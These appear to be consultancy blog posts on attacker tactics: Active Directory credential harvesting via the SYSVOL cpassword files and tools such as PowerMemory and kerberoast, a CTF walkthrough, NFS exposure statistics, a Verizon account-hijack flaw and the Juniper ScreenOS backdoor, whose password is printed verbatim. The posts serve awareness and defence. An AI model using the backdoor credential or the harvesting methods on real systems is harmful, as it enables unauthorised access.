Cybersecurity, Solved in 1 hour? Nope takes at least 1 Season..

Yes we are a nation of television watchers and expect everything to be solved quickly, since all TV shows end in 1 hour.

In the online book (in books.google) of “Television and Politics”

The problems solved in our shows apparently are remembered with ‘calls for action’ are the ones solved by individuals.

So maybe after a lifetime of watching these shows we have a predisposed subconscious notion to assume 1 person can solve most problems in a reasonable amount of time (1 hour or 2 hours).

So when a complex issue is placed in front of us such as

Red vs Blue  teams attackers vs defenders where a series of steps breach a server and then use more tools to keep access of the system without the defending teams knowledge.  The solution to this issue is not obvious.

So Why am I beating this horse again?  Because the principle will not go away. The attackers will find ways and use the systems we have to attack us.

For example… we want to defend our SQL servers, maybe by hiding them. But this will not work, as there are tools to ask our systems “what are the SQL servers”? And our computers dutifully answer this request.

 

Technical Example:  Do you have a domain controller? Which is automatically running Active Directory? The program that runs your network and username and password authentication.

Then how do you defend against a user asking various questions to your DC(Domain Controller) with some commands?

You can access Powershell from a command line, and then ask various questions (execute commands) like  get-service or get-process to find out what services and processes are running on the system.

Why is this important? Because you can pick a service running on the system and then try to see what users have access to this service with another tool PowerMemory for example (as the tool(RWMC) in this article is no longer supported)

Here is PowerMemory definition:

Exploit the credentials present in files and memory

PowerMemory levers Microsoft signed binaries to hack Microsoft operating systems.

So! you might say, how does one get command line access on a server?

Let’s say that you got the user to click on phishing malware and now a command line shell was opened, and connects back to one of the Command and Control servers.   techtarget.com explains this phenomena

 

Once the hacker has a command line opened (however they did it). Now they will try and get more access – by obtaining the passwords for administrator accounts.

How to do that?  Sean Metcalf in DEFCON 23 video discusses several methods.

Including using powershell tools created by hackers, tools like

PowerMemory  Exploit the credentials present in files and memory

kerberoast   a series of tools for attacking MS Kerberos implementations. Below is a brief overview of what each tool does.

The method of obtaining passwords from places on the Microsoft server is also useful: “Finding Passwords in SYSVOL & exploiting Group Policy preferences”  is a good article discussing the same topics as in the video.

The credentials can be taken from .xml files on any windows systems. If the system is in a domain then it will have a local user account and whoever logged into that particular system.

All domain Group Policies are stored here: \\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\

So the hacker knows where to look and what to find… the .xml files with CPassword variable, which has the password stored in an encrypted format.

So now it only depends on how strong your password is…

What are your password schema characteristics?  Do you require long passwords? more than 14 digits? Because if you have less than 14 digits the hackers will have an even easier time to get your passwords.

So is it still easy? Can you depend on only your defense team (Blue team) to keep all of your assets without unauthorized access? It will take more than a single episode, a season of episodes.  It will take a marathon of binge watching to keep the hackers away. It will take red teams (ethical hackers) to attack.

 

we can help you with a plan of security policies and red team attacks.

Contact Us.

 

 

Worried About 0Day Attacks? Take Care of 30day first!

I have been watching the Derbycon videos (put up by IronGeek) and I like Paul Coggin’s  comment: Are you worried about Day zero attacks? You have to take care of 80 day first.

derbycon2016-paulcoggin

I have heard Paul’s talks before and this one in Derbycon is a bit different, but the theme is the same – do not forget the lvl2 OSI exploits and threats.  This means that the Cisco devices can be attacked if not configured properly. This is obvious to him as he is the pentester versus Cisco routers.

 

Kind of funny as Paul says(as a side note) : “many companies are worried about Zero Day attacks but have not solved the 80 day attack”.

A Zero day attack is where an attack will succeed because the security problem has not been fixed yet.  I have said this before in this post from Dec15 of last year: “Zero-Day Attacks and why patching means catching up

It is a valid point Paul, if we do not have our patching process set up correctly we are not catching the 80 day old vulnerability not to even mention the Zero-day(we can’t catch that one) but important to note we should not focus on the Zero-day vulnerability since there is nothing to do about them.

 

Derbycon had a CTF (capture the flag) competition as well  which means there was a contest that had a real life hackers riddle … and solution that shows you some of the thought processes when a hacker makes on a take over of a machine.

At Derbycon’s CTF event the test hack uses the same process as a criminal hacker would in the real world

“Hacker Process”: also called a Kill Chain – Recon – Analysis – Penetrate – Control  we like to call it SVAPE&C.

Walking through the thought processes of the Hacker as they are performing their actions is important to design better defenses.

The red team (attackers) versus the blue team (defense) is the constant in the world of Computer security, so therefore there are these contests of CTF.

I don’t want to get into too many details, but a few are necessary:

In a capture the flag contest there is a lot of network traffic that the hacker (red team) has to digest and make sense of. Decide what traffic is useful and what system to review closer.

  1. System HELPDESK was found(with wireshark trafficsniffing) and it had ports 139 /tcp and 3456/tcp open (means Microsoft share ports) with nmap scanner
  2. Then a nbtscan was done to find out more information from the system
  3. Then a ping was done – which also gives out information
  4. the port 139 was Microsoft
  5. Port 3456 was odd so ncat was run to probe the port
  6. Here the CTF oddities response came just like the “War games ” movie in the 90’s “WOULD YOU LIKE TO PLAY A GAME?”
  7. From here the hack is now in a different stage having done reconnaissance and found the system and ports open.

tweetderbyconctf

So as you see in the Tweet the next point was to give a programmatic response to the port 3456 (even the port number is funny as there is no port service with that name.  As a hacker participating in the ctf once you saw that tweet now you know what to answer the question.

  1. The issue now was how to penetrate the box.
  2. The str$() response did not work correctly
  3. Hackers do what they do – and “hack” i.e. try different things until succeeding
  4. Through some tricks they were able to start a command.com dos command (after realizing this may be an old machine and the new hack tools do not work)
  5. Once the hacker can execute commands on the remote system what happens next?  It is the “control” piece.
  6. Now the hacker downloads hacking tools needed to truly control the machine. (ncat and registry program)
  7. From there they had to find the FlagMalwareBytes registry flag in the time allotted.

 

This particular team placed 3rd.

 

There is more to the CTF event but at this point I want to discuss the general nature of hacking.   It is true in this case the hacker was trying to control an ancient machine (windows98 or 95 even) but the principles are the same. In fact due to the nature of the old machines the hackers had to use older tools.

The one thing that we need to take as a lesson (no matter the system) is that most attack hacks try to download tools and other items to the system to be compromised. And it usually will be with manual commands ftp or wget.

So if you can review any manual tool commands running in your network that would be good.  Patching the local systems from all vulnerabilities gives you more defense against wily hackers.

 

Contact Us to discuss this and other items regarding hackers.

 

 

 

Another Day More Attacks To Defend From

Why does it seem that we are always defending? Seemingly the same thing every day – every month, as the patches come out IT departments must patch consistently and without fail.

fortinetglobalheatmap

Because if not what happens?  Such as from Fortinet’s¹ analysis 10% of all NFS servers in the world are vulnerable to a specific attack.

The Global heat-map shows the country most in danger is the USA, with China in 2nd place. Notice the largest economies have the highest vulnerabilities.

So what does 10% mean?

The solution here is to upgrade to a new version of NFS and enable encrypted  authentication

 

Fortinet researchers used the database Shodan.io² for their data.

shodanexploits-nfs

And if one goes to the site directly one can count 5 exploits, 4 remote, 2 DOS, and 1 local types under “NFS” for a total of 12.

 

there are 129 known CVE’s 7 in exploitdb and 5 known metasploit attacks.

To a hacker this is a known item.

So what can a hacker do this information?

Well they will do more research and find out where they actually are and whether they can hack or mine information from these NFS problems:

Thousands of the exposed servers were located in the U.S. (18,843 servers), China (11,608), France (10,744), Germany (7,188) and Russia (5,269), the firm reported.  This part of the data from Shogun/Fortinet actually resides on the

Securityintelligence.com³ IT news site.

Now we know of  18,843+11608+10744+7188+5269 = 53652 servers are susceptible to some type of attack. This is an obvious goldmine for hackers. Imagine that 10% of these exposed servers can get hacked in such a way do that the hacker can run their own programs on them (i.e. root or admin privilege with command line access). So now what?

~5400 servers may get ransomware that could gross $300 – $500 for each system – which means that $1.6mil to $2.7mil payoff could be coming to the hackers.

What if all the servers were susceptible to ransomware? then the payoff is $16mil to $27mil.

Now do you see what the danger is from attacks? Every day brings new dangers –  Don’t play Cyber roulette

1000gunbarrels

Every day you have a chance of firing a 500 or 1000 barrel risk gun and it “goes off” thus  The attacker finally made it in. The chance may be 1 in 500 every day, or 1 in a 1000.

Contact us to reduce your risk online.  Send us your email address and we will send you updates as they happen here.

 

 

  1. https://blog.fortinet.com/2016/05/30/misconfigured-nfs-servers-put-thousands-of-terabytes-of-data-at-risk
  2. https://exploits.shodan.io/?q=nfs
  3. https://securityintelligence.com/news/new-research-finds-10-percent-of-nfs-servers-globally-are-at-risk/

 

With This Hack Take Over Verizon Email Accounts

Randy Westergren¹ figured out a way to hijack a Verizon FiOS account  (FiOS is a bundled Internet, telephone, and TV service)

 

Randy was doing research into a vulnerability of compromised email accounts for the FiOS app,  and found a problem with the reset my password method on the Verizon website.

With a few computer tricks (if interested check details on his site) he was able to hijack an email account.

Before we all get excited he worked with Verizon from October of 2014 until October of 2015 and until final fix November 3rd. So this problem is now fixed.

Here is the pictoral representation of the hijack hack.

verizonFiOS-randywestergren-hack

 

Why would I post about a fixed issue?

 

Think about it  Verizon never tested this, and even after told about it took 1 year and a month to finally fix it.  How many accounts were falsely taken by enterprising Criminal hackers with  Billion dollar² warchests?

Verizon has opened a new website here http://www.verizonwireless.com/landingpages/report-security-vulnerability/

Or email Verizon Security directly: CorporateSecurity@verizonwireless.com.

 

My problem with corporate methods decisions are not fast enough. The decisions of the corporate heads require proof and a project and a champion in the department and X and Y  and Z.  In other words it will take a year or more to fix the problem because we are not ready.

 

How many other companies are in the same boat? Do we really have to get our email accounts hacked FIRST?

It is high time that the Directors, CIO, CTO, CEOs of all technology companies improve the Cybersecurity of their operation by setting up a test regime that is second to none. It is not enough to create a website that takes customer suggestions of impropriety.

The people with the most to lose (All the CxO’s) should know exactly how much  of an effort there is to test the heck out of the technology that is online right now.

systemengineeringassecurity

Contact Me to discuss

  1. http://randywestergren.com/hijacking-verizon-fios-accounts/
  2. http://oversitesentry.com/happy-new-year-2016/

Society Wants Technology – Does Not Realize Security Implications

Everyone heralds new improvements ever since the Renaissance in the 15th century  started an artistic and scientific improvement binge every year.

We are moving to another new year since time does not stand still for us to digest the current technology.

johannes-gutenberg  Johannes Gutenberg small bio at physic.org

So in 1440 we were inadvertently thrust as a society into the “new age” of enlightenment. And forever we will regret it in one sense.  In 1440 Mr. Gutenberg finished a hand press and printed the “poem of the last judgement” and the Calendar of 1448. Ever since then 567 years ago we have been moving ever forward admittedly things have gotten much faster with the Internet and computers.  But the people of the late 15th century did not realize what was happening until many years later.  As more and more collaboration of books and scientific thought started to be shared on a regular basis, it changed our society forever.

 

 

Today the same things are happening – except when new technologies are occurring and being implemented you may not notice the immediate effects. Especially since you may not be purchasing this new technology or technique. A new hacker technique due to a mistake can really change our lives without your knowledge. You may be completely oblivious, but it is still happening.

 

What does a Juniper hack have to do with our lives?

Network World had a story² yesterday (Dec 20) and was actually first posted on Juniper’s forums in the following manner:


 

Administrative Access (CVE-2015-7755) only affects ScreenOS 6.3.0r17 through 6.3.0r20. VPN Decryption (CVE-2015-7756) only affects ScreenOS 6.2.0r15 through 6.2.0r18 and 6.3.0r12 through 6.3.0r20.

We strongly recommend that all customers update their systems and apply these patched releases with the highest priority.

POSTED BY BOB WORRALL, SVP CHIEF INFORMATION OFFICER ON DECEMBER 17, 2015

 


 

But how long was this vulnerability actually out in the wild?

Let’s find the CVE bulleting of CVE-2015-7755.

Notice the note here in the CVE:

20151008 Disclaimer: The entry creation date may reflect when the CVE-ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.

So the entry date was October 8th 2015.  The vulnerability has been out for over 2 months now.

And actually the backdoor was known to nation-state actors for 3 years (according to Network world FBI/DHS).

today the Internet Storm Center has gone to the unusual step of declaring a Threat Level Yellow due to Juniper’s vulnerability:   isc.sans.edu³

internet StormCenterdec21stthreatlevelyellow

 

Needless to say if you have a Juniper router or firewall with Operating system 6.2 or 6.3 with the correct release you may  be vulnerable to telnet/ssh and are vulnerable to a vpn backdoor.

 

Just in case you missed it the backdoor password is” <<< %s(un='%s') = %u "

you can try to log in using that password then you know you are susceptible to this issue.

 

Back to my original point… We don’t realize for months that there is a new technique that could allow hackers access to our devices.  In this day and age the change of technology is down to months not years, and hackers know this. The criminals are aware of the problems that new technologies can bring even if you are not aware.

What can you do besides being vigilant?

Create an atmosphere of constant improvement, set up log analysis and review your logs using better methods on a weekly basis preferable,  but monthly at a minimum.

As in my previous post:  http://oversitesentry.com/what-to-look-for-in-logs-hackers-being-successful/

cybersecurityloganalysis

 

Contact Us to discuss

 

 

 

 

2. http://www.networkworld.com/article/3016802/security/fbi-dhs-investigating-juniper-hack-secret-backdoor-dates-back-3-years.html

3. https://isc.sans.edu/